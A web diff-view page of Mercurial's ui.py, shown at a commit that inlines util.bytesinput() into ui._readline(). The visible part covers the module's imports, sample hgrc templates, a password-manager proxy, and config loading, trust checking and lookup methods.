##// END OF EJS Templates
ui: inline util.bytesinput() into ui._readline()...
Yuya Nishihara -
r36809:30742c21 default
parent child Browse files
Show More
@@ -1,1851 +1,1857
1 # ui.py - user interface bits for mercurial
1 # ui.py - user interface bits for mercurial
2 #
2 #
3 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
3 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import collections
10 import collections
11 import contextlib
11 import contextlib
12 import errno
12 import errno
13 import getpass
13 import getpass
14 import inspect
14 import inspect
15 import os
15 import os
16 import re
16 import re
17 import signal
17 import signal
18 import socket
18 import socket
19 import subprocess
19 import subprocess
20 import sys
20 import sys
21 import tempfile
21 import tempfile
22 import traceback
22 import traceback
23
23
24 from .i18n import _
24 from .i18n import _
25 from .node import hex
25 from .node import hex
26
26
27 from . import (
27 from . import (
28 color,
28 color,
29 config,
29 config,
30 configitems,
30 configitems,
31 encoding,
31 encoding,
32 error,
32 error,
33 formatter,
33 formatter,
34 progress,
34 progress,
35 pycompat,
35 pycompat,
36 rcutil,
36 rcutil,
37 scmutil,
37 scmutil,
38 util,
38 util,
39 )
39 )
40 from .utils import dateutil
40 from .utils import dateutil
41
41
42 urlreq = util.urlreq
42 urlreq = util.urlreq
43
43
44 # for use with str.translate(None, _keepalnum), to keep just alphanumerics
44 # for use with str.translate(None, _keepalnum), to keep just alphanumerics
45 _keepalnum = ''.join(c for c in map(pycompat.bytechr, range(256))
45 _keepalnum = ''.join(c for c in map(pycompat.bytechr, range(256))
46 if not c.isalnum())
46 if not c.isalnum())
47
47
48 # The config knobs that will be altered (if unset) by ui.tweakdefaults.
48 # The config knobs that will be altered (if unset) by ui.tweakdefaults.
49 tweakrc = b"""
49 tweakrc = b"""
50 [ui]
50 [ui]
51 # The rollback command is dangerous. As a rule, don't use it.
51 # The rollback command is dangerous. As a rule, don't use it.
52 rollback = False
52 rollback = False
53 # Make `hg status` report copy information
53 # Make `hg status` report copy information
54 statuscopies = yes
54 statuscopies = yes
55 # Prefer curses UIs when available. Revert to plain-text with `text`.
55 # Prefer curses UIs when available. Revert to plain-text with `text`.
56 interface = curses
56 interface = curses
57
57
58 [commands]
58 [commands]
59 # Make `hg status` emit cwd-relative paths by default.
59 # Make `hg status` emit cwd-relative paths by default.
60 status.relative = yes
60 status.relative = yes
61 # Refuse to perform an `hg update` that would cause a file content merge
61 # Refuse to perform an `hg update` that would cause a file content merge
62 update.check = noconflict
62 update.check = noconflict
63
63
64 [diff]
64 [diff]
65 git = 1
65 git = 1
66 showfunc = 1
66 showfunc = 1
67 """
67 """
68
68
69 samplehgrcs = {
69 samplehgrcs = {
70 'user':
70 'user':
71 b"""# example user config (see 'hg help config' for more info)
71 b"""# example user config (see 'hg help config' for more info)
72 [ui]
72 [ui]
73 # name and email, e.g.
73 # name and email, e.g.
74 # username = Jane Doe <jdoe@example.com>
74 # username = Jane Doe <jdoe@example.com>
75 username =
75 username =
76
76
77 # We recommend enabling tweakdefaults to get slight improvements to
77 # We recommend enabling tweakdefaults to get slight improvements to
78 # the UI over time. Make sure to set HGPLAIN in the environment when
78 # the UI over time. Make sure to set HGPLAIN in the environment when
79 # writing scripts!
79 # writing scripts!
80 # tweakdefaults = True
80 # tweakdefaults = True
81
81
82 # uncomment to disable color in command output
82 # uncomment to disable color in command output
83 # (see 'hg help color' for details)
83 # (see 'hg help color' for details)
84 # color = never
84 # color = never
85
85
86 # uncomment to disable command output pagination
86 # uncomment to disable command output pagination
87 # (see 'hg help pager' for details)
87 # (see 'hg help pager' for details)
88 # paginate = never
88 # paginate = never
89
89
90 [extensions]
90 [extensions]
91 # uncomment these lines to enable some popular extensions
91 # uncomment these lines to enable some popular extensions
92 # (see 'hg help extensions' for more info)
92 # (see 'hg help extensions' for more info)
93 #
93 #
94 # churn =
94 # churn =
95 """,
95 """,
96
96
97 'cloned':
97 'cloned':
98 b"""# example repository config (see 'hg help config' for more info)
98 b"""# example repository config (see 'hg help config' for more info)
99 [paths]
99 [paths]
100 default = %s
100 default = %s
101
101
102 # path aliases to other clones of this repo in URLs or filesystem paths
102 # path aliases to other clones of this repo in URLs or filesystem paths
103 # (see 'hg help config.paths' for more info)
103 # (see 'hg help config.paths' for more info)
104 #
104 #
105 # default:pushurl = ssh://jdoe@example.net/hg/jdoes-fork
105 # default:pushurl = ssh://jdoe@example.net/hg/jdoes-fork
106 # my-fork = ssh://jdoe@example.net/hg/jdoes-fork
106 # my-fork = ssh://jdoe@example.net/hg/jdoes-fork
107 # my-clone = /home/jdoe/jdoes-clone
107 # my-clone = /home/jdoe/jdoes-clone
108
108
109 [ui]
109 [ui]
110 # name and email (local to this repository, optional), e.g.
110 # name and email (local to this repository, optional), e.g.
111 # username = Jane Doe <jdoe@example.com>
111 # username = Jane Doe <jdoe@example.com>
112 """,
112 """,
113
113
114 'local':
114 'local':
115 b"""# example repository config (see 'hg help config' for more info)
115 b"""# example repository config (see 'hg help config' for more info)
116 [paths]
116 [paths]
117 # path aliases to other clones of this repo in URLs or filesystem paths
117 # path aliases to other clones of this repo in URLs or filesystem paths
118 # (see 'hg help config.paths' for more info)
118 # (see 'hg help config.paths' for more info)
119 #
119 #
120 # default = http://example.com/hg/example-repo
120 # default = http://example.com/hg/example-repo
121 # default:pushurl = ssh://jdoe@example.net/hg/jdoes-fork
121 # default:pushurl = ssh://jdoe@example.net/hg/jdoes-fork
122 # my-fork = ssh://jdoe@example.net/hg/jdoes-fork
122 # my-fork = ssh://jdoe@example.net/hg/jdoes-fork
123 # my-clone = /home/jdoe/jdoes-clone
123 # my-clone = /home/jdoe/jdoes-clone
124
124
125 [ui]
125 [ui]
126 # name and email (local to this repository, optional), e.g.
126 # name and email (local to this repository, optional), e.g.
127 # username = Jane Doe <jdoe@example.com>
127 # username = Jane Doe <jdoe@example.com>
128 """,
128 """,
129
129
130 'global':
130 'global':
131 b"""# example system-wide hg config (see 'hg help config' for more info)
131 b"""# example system-wide hg config (see 'hg help config' for more info)
132
132
133 [ui]
133 [ui]
134 # uncomment to disable color in command output
134 # uncomment to disable color in command output
135 # (see 'hg help color' for details)
135 # (see 'hg help color' for details)
136 # color = never
136 # color = never
137
137
138 # uncomment to disable command output pagination
138 # uncomment to disable command output pagination
139 # (see 'hg help pager' for details)
139 # (see 'hg help pager' for details)
140 # paginate = never
140 # paginate = never
141
141
142 [extensions]
142 [extensions]
143 # uncomment these lines to enable some popular extensions
143 # uncomment these lines to enable some popular extensions
144 # (see 'hg help extensions' for more info)
144 # (see 'hg help extensions' for more info)
145 #
145 #
146 # blackbox =
146 # blackbox =
147 # churn =
147 # churn =
148 """,
148 """,
149 }
149 }
150
150
151 def _maybestrurl(maybebytes):
151 def _maybestrurl(maybebytes):
152 return util.rapply(pycompat.strurl, maybebytes)
152 return util.rapply(pycompat.strurl, maybebytes)
153
153
154 def _maybebytesurl(maybestr):
154 def _maybebytesurl(maybestr):
155 return util.rapply(pycompat.bytesurl, maybestr)
155 return util.rapply(pycompat.bytesurl, maybestr)
156
156
157 class httppasswordmgrdbproxy(object):
157 class httppasswordmgrdbproxy(object):
158 """Delays loading urllib2 until it's needed."""
158 """Delays loading urllib2 until it's needed."""
159 def __init__(self):
159 def __init__(self):
160 self._mgr = None
160 self._mgr = None
161
161
162 def _get_mgr(self):
162 def _get_mgr(self):
163 if self._mgr is None:
163 if self._mgr is None:
164 self._mgr = urlreq.httppasswordmgrwithdefaultrealm()
164 self._mgr = urlreq.httppasswordmgrwithdefaultrealm()
165 return self._mgr
165 return self._mgr
166
166
167 def add_password(self, realm, uris, user, passwd):
167 def add_password(self, realm, uris, user, passwd):
168 return self._get_mgr().add_password(
168 return self._get_mgr().add_password(
169 _maybestrurl(realm), _maybestrurl(uris),
169 _maybestrurl(realm), _maybestrurl(uris),
170 _maybestrurl(user), _maybestrurl(passwd))
170 _maybestrurl(user), _maybestrurl(passwd))
171
171
172 def find_user_password(self, realm, uri):
172 def find_user_password(self, realm, uri):
173 mgr = self._get_mgr()
173 mgr = self._get_mgr()
174 return _maybebytesurl(mgr.find_user_password(_maybestrurl(realm),
174 return _maybebytesurl(mgr.find_user_password(_maybestrurl(realm),
175 _maybestrurl(uri)))
175 _maybestrurl(uri)))
176
176
177 def _catchterm(*args):
177 def _catchterm(*args):
178 raise error.SignalInterrupt
178 raise error.SignalInterrupt
179
179
180 # unique object used to detect no default value has been provided when
180 # unique object used to detect no default value has been provided when
181 # retrieving configuration value.
181 # retrieving configuration value.
182 _unset = object()
182 _unset = object()
183
183
184 # _reqexithandlers: callbacks run at the end of a request
184 # _reqexithandlers: callbacks run at the end of a request
185 _reqexithandlers = []
185 _reqexithandlers = []
186
186
187 class ui(object):
187 class ui(object):
188 def __init__(self, src=None):
188 def __init__(self, src=None):
189 """Create a fresh new ui object if no src given
189 """Create a fresh new ui object if no src given
190
190
191 Use uimod.ui.load() to create a ui which knows global and user configs.
191 Use uimod.ui.load() to create a ui which knows global and user configs.
192 In most cases, you should use ui.copy() to create a copy of an existing
192 In most cases, you should use ui.copy() to create a copy of an existing
193 ui object.
193 ui object.
194 """
194 """
195 # _buffers: used for temporary capture of output
195 # _buffers: used for temporary capture of output
196 self._buffers = []
196 self._buffers = []
197 # 3-tuple describing how each buffer in the stack behaves.
197 # 3-tuple describing how each buffer in the stack behaves.
198 # Values are (capture stderr, capture subprocesses, apply labels).
198 # Values are (capture stderr, capture subprocesses, apply labels).
199 self._bufferstates = []
199 self._bufferstates = []
200 # When a buffer is active, defines whether we are expanding labels.
200 # When a buffer is active, defines whether we are expanding labels.
201 # This exists to prevent an extra list lookup.
201 # This exists to prevent an extra list lookup.
202 self._bufferapplylabels = None
202 self._bufferapplylabels = None
203 self.quiet = self.verbose = self.debugflag = self.tracebackflag = False
203 self.quiet = self.verbose = self.debugflag = self.tracebackflag = False
204 self._reportuntrusted = True
204 self._reportuntrusted = True
205 self._knownconfig = configitems.coreitems
205 self._knownconfig = configitems.coreitems
206 self._ocfg = config.config() # overlay
206 self._ocfg = config.config() # overlay
207 self._tcfg = config.config() # trusted
207 self._tcfg = config.config() # trusted
208 self._ucfg = config.config() # untrusted
208 self._ucfg = config.config() # untrusted
209 self._trustusers = set()
209 self._trustusers = set()
210 self._trustgroups = set()
210 self._trustgroups = set()
211 self.callhooks = True
211 self.callhooks = True
212 # Insecure server connections requested.
212 # Insecure server connections requested.
213 self.insecureconnections = False
213 self.insecureconnections = False
214 # Blocked time
214 # Blocked time
215 self.logblockedtimes = False
215 self.logblockedtimes = False
216 # color mode: see mercurial/color.py for possible value
216 # color mode: see mercurial/color.py for possible value
217 self._colormode = None
217 self._colormode = None
218 self._terminfoparams = {}
218 self._terminfoparams = {}
219 self._styles = {}
219 self._styles = {}
220
220
221 if src:
221 if src:
222 self.fout = src.fout
222 self.fout = src.fout
223 self.ferr = src.ferr
223 self.ferr = src.ferr
224 self.fin = src.fin
224 self.fin = src.fin
225 self.pageractive = src.pageractive
225 self.pageractive = src.pageractive
226 self._disablepager = src._disablepager
226 self._disablepager = src._disablepager
227 self._tweaked = src._tweaked
227 self._tweaked = src._tweaked
228
228
229 self._tcfg = src._tcfg.copy()
229 self._tcfg = src._tcfg.copy()
230 self._ucfg = src._ucfg.copy()
230 self._ucfg = src._ucfg.copy()
231 self._ocfg = src._ocfg.copy()
231 self._ocfg = src._ocfg.copy()
232 self._trustusers = src._trustusers.copy()
232 self._trustusers = src._trustusers.copy()
233 self._trustgroups = src._trustgroups.copy()
233 self._trustgroups = src._trustgroups.copy()
234 self.environ = src.environ
234 self.environ = src.environ
235 self.callhooks = src.callhooks
235 self.callhooks = src.callhooks
236 self.insecureconnections = src.insecureconnections
236 self.insecureconnections = src.insecureconnections
237 self._colormode = src._colormode
237 self._colormode = src._colormode
238 self._terminfoparams = src._terminfoparams.copy()
238 self._terminfoparams = src._terminfoparams.copy()
239 self._styles = src._styles.copy()
239 self._styles = src._styles.copy()
240
240
241 self.fixconfig()
241 self.fixconfig()
242
242
243 self.httppasswordmgrdb = src.httppasswordmgrdb
243 self.httppasswordmgrdb = src.httppasswordmgrdb
244 self._blockedtimes = src._blockedtimes
244 self._blockedtimes = src._blockedtimes
245 else:
245 else:
246 self.fout = util.stdout
246 self.fout = util.stdout
247 self.ferr = util.stderr
247 self.ferr = util.stderr
248 self.fin = util.stdin
248 self.fin = util.stdin
249 self.pageractive = False
249 self.pageractive = False
250 self._disablepager = False
250 self._disablepager = False
251 self._tweaked = False
251 self._tweaked = False
252
252
253 # shared read-only environment
253 # shared read-only environment
254 self.environ = encoding.environ
254 self.environ = encoding.environ
255
255
256 self.httppasswordmgrdb = httppasswordmgrdbproxy()
256 self.httppasswordmgrdb = httppasswordmgrdbproxy()
257 self._blockedtimes = collections.defaultdict(int)
257 self._blockedtimes = collections.defaultdict(int)
258
258
259 allowed = self.configlist('experimental', 'exportableenviron')
259 allowed = self.configlist('experimental', 'exportableenviron')
260 if '*' in allowed:
260 if '*' in allowed:
261 self._exportableenviron = self.environ
261 self._exportableenviron = self.environ
262 else:
262 else:
263 self._exportableenviron = {}
263 self._exportableenviron = {}
264 for k in allowed:
264 for k in allowed:
265 if k in self.environ:
265 if k in self.environ:
266 self._exportableenviron[k] = self.environ[k]
266 self._exportableenviron[k] = self.environ[k]
267
267
268 @classmethod
268 @classmethod
269 def load(cls):
269 def load(cls):
270 """Create a ui and load global and user configs"""
270 """Create a ui and load global and user configs"""
271 u = cls()
271 u = cls()
272 # we always trust global config files and environment variables
272 # we always trust global config files and environment variables
273 for t, f in rcutil.rccomponents():
273 for t, f in rcutil.rccomponents():
274 if t == 'path':
274 if t == 'path':
275 u.readconfig(f, trust=True)
275 u.readconfig(f, trust=True)
276 elif t == 'items':
276 elif t == 'items':
277 sections = set()
277 sections = set()
278 for section, name, value, source in f:
278 for section, name, value, source in f:
279 # do not set u._ocfg
279 # do not set u._ocfg
280 # XXX clean this up once immutable config object is a thing
280 # XXX clean this up once immutable config object is a thing
281 u._tcfg.set(section, name, value, source)
281 u._tcfg.set(section, name, value, source)
282 u._ucfg.set(section, name, value, source)
282 u._ucfg.set(section, name, value, source)
283 sections.add(section)
283 sections.add(section)
284 for section in sections:
284 for section in sections:
285 u.fixconfig(section=section)
285 u.fixconfig(section=section)
286 else:
286 else:
287 raise error.ProgrammingError('unknown rctype: %s' % t)
287 raise error.ProgrammingError('unknown rctype: %s' % t)
288 u._maybetweakdefaults()
288 u._maybetweakdefaults()
289 return u
289 return u
290
290
291 def _maybetweakdefaults(self):
291 def _maybetweakdefaults(self):
292 if not self.configbool('ui', 'tweakdefaults'):
292 if not self.configbool('ui', 'tweakdefaults'):
293 return
293 return
294 if self._tweaked or self.plain('tweakdefaults'):
294 if self._tweaked or self.plain('tweakdefaults'):
295 return
295 return
296
296
297 # Note: it is SUPER IMPORTANT that you set self._tweaked to
297 # Note: it is SUPER IMPORTANT that you set self._tweaked to
298 # True *before* any calls to setconfig(), otherwise you'll get
298 # True *before* any calls to setconfig(), otherwise you'll get
299 # infinite recursion between setconfig and this method.
299 # infinite recursion between setconfig and this method.
300 #
300 #
301 # TODO: We should extract an inner method in setconfig() to
301 # TODO: We should extract an inner method in setconfig() to
302 # avoid this weirdness.
302 # avoid this weirdness.
303 self._tweaked = True
303 self._tweaked = True
304 tmpcfg = config.config()
304 tmpcfg = config.config()
305 tmpcfg.parse('<tweakdefaults>', tweakrc)
305 tmpcfg.parse('<tweakdefaults>', tweakrc)
306 for section in tmpcfg:
306 for section in tmpcfg:
307 for name, value in tmpcfg.items(section):
307 for name, value in tmpcfg.items(section):
308 if not self.hasconfig(section, name):
308 if not self.hasconfig(section, name):
309 self.setconfig(section, name, value, "<tweakdefaults>")
309 self.setconfig(section, name, value, "<tweakdefaults>")
310
310
311 def copy(self):
311 def copy(self):
312 return self.__class__(self)
312 return self.__class__(self)
313
313
314 def resetstate(self):
314 def resetstate(self):
315 """Clear internal state that shouldn't persist across commands"""
315 """Clear internal state that shouldn't persist across commands"""
316 if self._progbar:
316 if self._progbar:
317 self._progbar.resetstate() # reset last-print time of progress bar
317 self._progbar.resetstate() # reset last-print time of progress bar
318 self.httppasswordmgrdb = httppasswordmgrdbproxy()
318 self.httppasswordmgrdb = httppasswordmgrdbproxy()
319
319
320 @contextlib.contextmanager
320 @contextlib.contextmanager
321 def timeblockedsection(self, key):
321 def timeblockedsection(self, key):
322 # this is open-coded below - search for timeblockedsection to find them
322 # this is open-coded below - search for timeblockedsection to find them
323 starttime = util.timer()
323 starttime = util.timer()
324 try:
324 try:
325 yield
325 yield
326 finally:
326 finally:
327 self._blockedtimes[key + '_blocked'] += \
327 self._blockedtimes[key + '_blocked'] += \
328 (util.timer() - starttime) * 1000
328 (util.timer() - starttime) * 1000
329
329
330 def formatter(self, topic, opts):
330 def formatter(self, topic, opts):
331 return formatter.formatter(self, self, topic, opts)
331 return formatter.formatter(self, self, topic, opts)
332
332
333 def _trusted(self, fp, f):
333 def _trusted(self, fp, f):
334 st = util.fstat(fp)
334 st = util.fstat(fp)
335 if util.isowner(st):
335 if util.isowner(st):
336 return True
336 return True
337
337
338 tusers, tgroups = self._trustusers, self._trustgroups
338 tusers, tgroups = self._trustusers, self._trustgroups
339 if '*' in tusers or '*' in tgroups:
339 if '*' in tusers or '*' in tgroups:
340 return True
340 return True
341
341
342 user = util.username(st.st_uid)
342 user = util.username(st.st_uid)
343 group = util.groupname(st.st_gid)
343 group = util.groupname(st.st_gid)
344 if user in tusers or group in tgroups or user == util.username():
344 if user in tusers or group in tgroups or user == util.username():
345 return True
345 return True
346
346
347 if self._reportuntrusted:
347 if self._reportuntrusted:
348 self.warn(_('not trusting file %s from untrusted '
348 self.warn(_('not trusting file %s from untrusted '
349 'user %s, group %s\n') % (f, user, group))
349 'user %s, group %s\n') % (f, user, group))
350 return False
350 return False
351
351
352 def readconfig(self, filename, root=None, trust=False,
352 def readconfig(self, filename, root=None, trust=False,
353 sections=None, remap=None):
353 sections=None, remap=None):
354 try:
354 try:
355 fp = open(filename, u'rb')
355 fp = open(filename, u'rb')
356 except IOError:
356 except IOError:
357 if not sections: # ignore unless we were looking for something
357 if not sections: # ignore unless we were looking for something
358 return
358 return
359 raise
359 raise
360
360
361 cfg = config.config()
361 cfg = config.config()
362 trusted = sections or trust or self._trusted(fp, filename)
362 trusted = sections or trust or self._trusted(fp, filename)
363
363
364 try:
364 try:
365 cfg.read(filename, fp, sections=sections, remap=remap)
365 cfg.read(filename, fp, sections=sections, remap=remap)
366 fp.close()
366 fp.close()
367 except error.ConfigError as inst:
367 except error.ConfigError as inst:
368 if trusted:
368 if trusted:
369 raise
369 raise
370 self.warn(_("ignored: %s\n") % util.forcebytestr(inst))
370 self.warn(_("ignored: %s\n") % util.forcebytestr(inst))
371
371
372 if self.plain():
372 if self.plain():
373 for k in ('debug', 'fallbackencoding', 'quiet', 'slash',
373 for k in ('debug', 'fallbackencoding', 'quiet', 'slash',
374 'logtemplate', 'statuscopies', 'style',
374 'logtemplate', 'statuscopies', 'style',
375 'traceback', 'verbose'):
375 'traceback', 'verbose'):
376 if k in cfg['ui']:
376 if k in cfg['ui']:
377 del cfg['ui'][k]
377 del cfg['ui'][k]
378 for k, v in cfg.items('defaults'):
378 for k, v in cfg.items('defaults'):
379 del cfg['defaults'][k]
379 del cfg['defaults'][k]
380 for k, v in cfg.items('commands'):
380 for k, v in cfg.items('commands'):
381 del cfg['commands'][k]
381 del cfg['commands'][k]
382 # Don't remove aliases from the configuration if in the exceptionlist
382 # Don't remove aliases from the configuration if in the exceptionlist
383 if self.plain('alias'):
383 if self.plain('alias'):
384 for k, v in cfg.items('alias'):
384 for k, v in cfg.items('alias'):
385 del cfg['alias'][k]
385 del cfg['alias'][k]
386 if self.plain('revsetalias'):
386 if self.plain('revsetalias'):
387 for k, v in cfg.items('revsetalias'):
387 for k, v in cfg.items('revsetalias'):
388 del cfg['revsetalias'][k]
388 del cfg['revsetalias'][k]
389 if self.plain('templatealias'):
389 if self.plain('templatealias'):
390 for k, v in cfg.items('templatealias'):
390 for k, v in cfg.items('templatealias'):
391 del cfg['templatealias'][k]
391 del cfg['templatealias'][k]
392
392
393 if trusted:
393 if trusted:
394 self._tcfg.update(cfg)
394 self._tcfg.update(cfg)
395 self._tcfg.update(self._ocfg)
395 self._tcfg.update(self._ocfg)
396 self._ucfg.update(cfg)
396 self._ucfg.update(cfg)
397 self._ucfg.update(self._ocfg)
397 self._ucfg.update(self._ocfg)
398
398
399 if root is None:
399 if root is None:
400 root = os.path.expanduser('~')
400 root = os.path.expanduser('~')
401 self.fixconfig(root=root)
401 self.fixconfig(root=root)
402
402
403 def fixconfig(self, root=None, section=None):
403 def fixconfig(self, root=None, section=None):
404 if section in (None, 'paths'):
404 if section in (None, 'paths'):
405 # expand vars and ~
405 # expand vars and ~
406 # translate paths relative to root (or home) into absolute paths
406 # translate paths relative to root (or home) into absolute paths
407 root = root or pycompat.getcwd()
407 root = root or pycompat.getcwd()
408 for c in self._tcfg, self._ucfg, self._ocfg:
408 for c in self._tcfg, self._ucfg, self._ocfg:
409 for n, p in c.items('paths'):
409 for n, p in c.items('paths'):
410 # Ignore sub-options.
410 # Ignore sub-options.
411 if ':' in n:
411 if ':' in n:
412 continue
412 continue
413 if not p:
413 if not p:
414 continue
414 continue
415 if '%%' in p:
415 if '%%' in p:
416 s = self.configsource('paths', n) or 'none'
416 s = self.configsource('paths', n) or 'none'
417 self.warn(_("(deprecated '%%' in path %s=%s from %s)\n")
417 self.warn(_("(deprecated '%%' in path %s=%s from %s)\n")
418 % (n, p, s))
418 % (n, p, s))
419 p = p.replace('%%', '%')
419 p = p.replace('%%', '%')
420 p = util.expandpath(p)
420 p = util.expandpath(p)
421 if not util.hasscheme(p) and not os.path.isabs(p):
421 if not util.hasscheme(p) and not os.path.isabs(p):
422 p = os.path.normpath(os.path.join(root, p))
422 p = os.path.normpath(os.path.join(root, p))
423 c.set("paths", n, p)
423 c.set("paths", n, p)
424
424
425 if section in (None, 'ui'):
425 if section in (None, 'ui'):
426 # update ui options
426 # update ui options
427 self.debugflag = self.configbool('ui', 'debug')
427 self.debugflag = self.configbool('ui', 'debug')
428 self.verbose = self.debugflag or self.configbool('ui', 'verbose')
428 self.verbose = self.debugflag or self.configbool('ui', 'verbose')
429 self.quiet = not self.debugflag and self.configbool('ui', 'quiet')
429 self.quiet = not self.debugflag and self.configbool('ui', 'quiet')
430 if self.verbose and self.quiet:
430 if self.verbose and self.quiet:
431 self.quiet = self.verbose = False
431 self.quiet = self.verbose = False
432 self._reportuntrusted = self.debugflag or self.configbool("ui",
432 self._reportuntrusted = self.debugflag or self.configbool("ui",
433 "report_untrusted")
433 "report_untrusted")
434 self.tracebackflag = self.configbool('ui', 'traceback')
434 self.tracebackflag = self.configbool('ui', 'traceback')
435 self.logblockedtimes = self.configbool('ui', 'logblockedtimes')
435 self.logblockedtimes = self.configbool('ui', 'logblockedtimes')
436
436
437 if section in (None, 'trusted'):
437 if section in (None, 'trusted'):
438 # update trust information
438 # update trust information
439 self._trustusers.update(self.configlist('trusted', 'users'))
439 self._trustusers.update(self.configlist('trusted', 'users'))
440 self._trustgroups.update(self.configlist('trusted', 'groups'))
440 self._trustgroups.update(self.configlist('trusted', 'groups'))
441
441
442 def backupconfig(self, section, item):
442 def backupconfig(self, section, item):
443 return (self._ocfg.backup(section, item),
443 return (self._ocfg.backup(section, item),
444 self._tcfg.backup(section, item),
444 self._tcfg.backup(section, item),
445 self._ucfg.backup(section, item),)
445 self._ucfg.backup(section, item),)
446 def restoreconfig(self, data):
446 def restoreconfig(self, data):
447 self._ocfg.restore(data[0])
447 self._ocfg.restore(data[0])
448 self._tcfg.restore(data[1])
448 self._tcfg.restore(data[1])
449 self._ucfg.restore(data[2])
449 self._ucfg.restore(data[2])
450
450
451 def setconfig(self, section, name, value, source=''):
451 def setconfig(self, section, name, value, source=''):
452 for cfg in (self._ocfg, self._tcfg, self._ucfg):
452 for cfg in (self._ocfg, self._tcfg, self._ucfg):
453 cfg.set(section, name, value, source)
453 cfg.set(section, name, value, source)
454 self.fixconfig(section=section)
454 self.fixconfig(section=section)
455 self._maybetweakdefaults()
455 self._maybetweakdefaults()
456
456
457 def _data(self, untrusted):
457 def _data(self, untrusted):
458 return untrusted and self._ucfg or self._tcfg
458 return untrusted and self._ucfg or self._tcfg
459
459
460 def configsource(self, section, name, untrusted=False):
460 def configsource(self, section, name, untrusted=False):
461 return self._data(untrusted).source(section, name)
461 return self._data(untrusted).source(section, name)
462
462
463 def config(self, section, name, default=_unset, untrusted=False):
463 def config(self, section, name, default=_unset, untrusted=False):
464 """return the plain string version of a config"""
464 """return the plain string version of a config"""
465 value = self._config(section, name, default=default,
465 value = self._config(section, name, default=default,
466 untrusted=untrusted)
466 untrusted=untrusted)
467 if value is _unset:
467 if value is _unset:
468 return None
468 return None
469 return value
469 return value
470
470
471 def _config(self, section, name, default=_unset, untrusted=False):
471 def _config(self, section, name, default=_unset, untrusted=False):
472 value = itemdefault = default
472 value = itemdefault = default
473 item = self._knownconfig.get(section, {}).get(name)
473 item = self._knownconfig.get(section, {}).get(name)
474 alternates = [(section, name)]
474 alternates = [(section, name)]
475
475
476 if item is not None:
476 if item is not None:
477 alternates.extend(item.alias)
477 alternates.extend(item.alias)
478 if callable(item.default):
478 if callable(item.default):
479 itemdefault = item.default()
479 itemdefault = item.default()
480 else:
480 else:
481 itemdefault = item.default
481 itemdefault = item.default
482 else:
482 else:
483 msg = ("accessing unregistered config item: '%s.%s'")
483 msg = ("accessing unregistered config item: '%s.%s'")
484 msg %= (section, name)
484 msg %= (section, name)
485 self.develwarn(msg, 2, 'warn-config-unknown')
485 self.develwarn(msg, 2, 'warn-config-unknown')
486
486
487 if default is _unset:
487 if default is _unset:
488 if item is None:
488 if item is None:
489 value = default
489 value = default
490 elif item.default is configitems.dynamicdefault:
490 elif item.default is configitems.dynamicdefault:
491 value = None
491 value = None
492 msg = "config item requires an explicit default value: '%s.%s'"
492 msg = "config item requires an explicit default value: '%s.%s'"
493 msg %= (section, name)
493 msg %= (section, name)
494 self.develwarn(msg, 2, 'warn-config-default')
494 self.develwarn(msg, 2, 'warn-config-default')
495 else:
495 else:
496 value = itemdefault
496 value = itemdefault
497 elif (item is not None
497 elif (item is not None
498 and item.default is not configitems.dynamicdefault
498 and item.default is not configitems.dynamicdefault
499 and default != itemdefault):
499 and default != itemdefault):
500 msg = ("specifying a mismatched default value for a registered "
500 msg = ("specifying a mismatched default value for a registered "
501 "config item: '%s.%s' '%s'")
501 "config item: '%s.%s' '%s'")
502 msg %= (section, name, pycompat.bytestr(default))
502 msg %= (section, name, pycompat.bytestr(default))
503 self.develwarn(msg, 2, 'warn-config-default')
503 self.develwarn(msg, 2, 'warn-config-default')
504
504
505 for s, n in alternates:
505 for s, n in alternates:
506 candidate = self._data(untrusted).get(s, n, None)
506 candidate = self._data(untrusted).get(s, n, None)
507 if candidate is not None:
507 if candidate is not None:
508 value = candidate
508 value = candidate
509 section = s
509 section = s
510 name = n
510 name = n
511 break
511 break
512
512
513 if self.debugflag and not untrusted and self._reportuntrusted:
513 if self.debugflag and not untrusted and self._reportuntrusted:
514 for s, n in alternates:
514 for s, n in alternates:
515 uvalue = self._ucfg.get(s, n)
515 uvalue = self._ucfg.get(s, n)
516 if uvalue is not None and uvalue != value:
516 if uvalue is not None and uvalue != value:
517 self.debug("ignoring untrusted configuration option "
517 self.debug("ignoring untrusted configuration option "
518 "%s.%s = %s\n" % (s, n, uvalue))
518 "%s.%s = %s\n" % (s, n, uvalue))
519 return value
519 return value
520
520
521 def configsuboptions(self, section, name, default=_unset, untrusted=False):
521 def configsuboptions(self, section, name, default=_unset, untrusted=False):
522 """Get a config option and all sub-options.
522 """Get a config option and all sub-options.
523
523
524 Some config options have sub-options that are declared with the
524 Some config options have sub-options that are declared with the
525 format "key:opt = value". This method is used to return the main
525 format "key:opt = value". This method is used to return the main
526 option and all its declared sub-options.
526 option and all its declared sub-options.
527
527
528 Returns a 2-tuple of ``(option, sub-options)``, where `sub-options``
528 Returns a 2-tuple of ``(option, sub-options)``, where `sub-options``
529 is a dict of defined sub-options where keys and values are strings.
529 is a dict of defined sub-options where keys and values are strings.
530 """
530 """
531 main = self.config(section, name, default, untrusted=untrusted)
531 main = self.config(section, name, default, untrusted=untrusted)
532 data = self._data(untrusted)
532 data = self._data(untrusted)
533 sub = {}
533 sub = {}
534 prefix = '%s:' % name
534 prefix = '%s:' % name
535 for k, v in data.items(section):
535 for k, v in data.items(section):
536 if k.startswith(prefix):
536 if k.startswith(prefix):
537 sub[k[len(prefix):]] = v
537 sub[k[len(prefix):]] = v
538
538
539 if self.debugflag and not untrusted and self._reportuntrusted:
539 if self.debugflag and not untrusted and self._reportuntrusted:
540 for k, v in sub.items():
540 for k, v in sub.items():
541 uvalue = self._ucfg.get(section, '%s:%s' % (name, k))
541 uvalue = self._ucfg.get(section, '%s:%s' % (name, k))
542 if uvalue is not None and uvalue != v:
542 if uvalue is not None and uvalue != v:
543 self.debug('ignoring untrusted configuration option '
543 self.debug('ignoring untrusted configuration option '
544 '%s:%s.%s = %s\n' % (section, name, k, uvalue))
544 '%s:%s.%s = %s\n' % (section, name, k, uvalue))
545
545
546 return main, sub
546 return main, sub
547
547
548 def configpath(self, section, name, default=_unset, untrusted=False):
548 def configpath(self, section, name, default=_unset, untrusted=False):
549 'get a path config item, expanded relative to repo root or config file'
